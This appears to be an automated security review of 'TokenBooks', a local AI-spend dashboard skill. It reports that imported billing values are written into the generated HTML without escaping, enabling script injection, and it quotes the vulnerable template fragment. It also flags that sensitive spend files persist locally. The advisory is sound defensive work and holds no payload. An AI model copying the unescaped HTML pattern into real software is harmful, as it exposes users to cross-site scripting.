TokenBooks Cross-Provider AI Spend Dashboard
ReviewAudited by ClawScan on May 10, 2026.
Overview
TokenBooks appears to be a local, offline AI-spend analyzer, but its generated HTML dashboard embeds imported values without escaping, so a malicious or tampered billing file could run script when opened.
This skill does not show evidence of network calls or credential use, and its core purpose is coherent. Before installing, be aware that imported billing data and generated reports are sensitive, and avoid opening dashboards generated from untrusted or edited CSV/JSON files unless the HTML escaping issue is fixed.
Findings (2)
Artifact-based informational review of SKILL.md, metadata, install specs, static scan signals, and capability signals. ClawScan does not execute the skill or run runtime probes.
If you generate a dashboard from a malicious or tampered billing file and open it in a browser, injected script could read or transmit the spend data shown in that page.
The dashboard generator embeds imported provider/model values directly into HTML. No html.escape or equivalent sanitization is shown, so crafted CSV/JSON values could become active markup or script in dashboard.html.
<span><strong>{provider}</strong></span> ... <span><strong>{model}</strong></span>Only generate dashboards from trusted billing exports, avoid opening or sharing dashboards made from untrusted custom CSV/JSON, and update the code to HTML-escape all user/imported strings before writing the report.
Local JSON and HTML outputs may reveal provider usage, model usage, costs, and task labels to anyone who can access or receive those files.
The skill intentionally stores imported billing records and generated spend summaries in local files. This is purpose-aligned, but those files can persist beyond the session and may be shared or reused.
python3 token_import.py openai_billing.csv --provider openai --output data.json ... python3 token_report.py data.json --output dashboard.html
Treat generated data.json and dashboard.html files as sensitive financial/usage records; store, share, and delete them accordingly.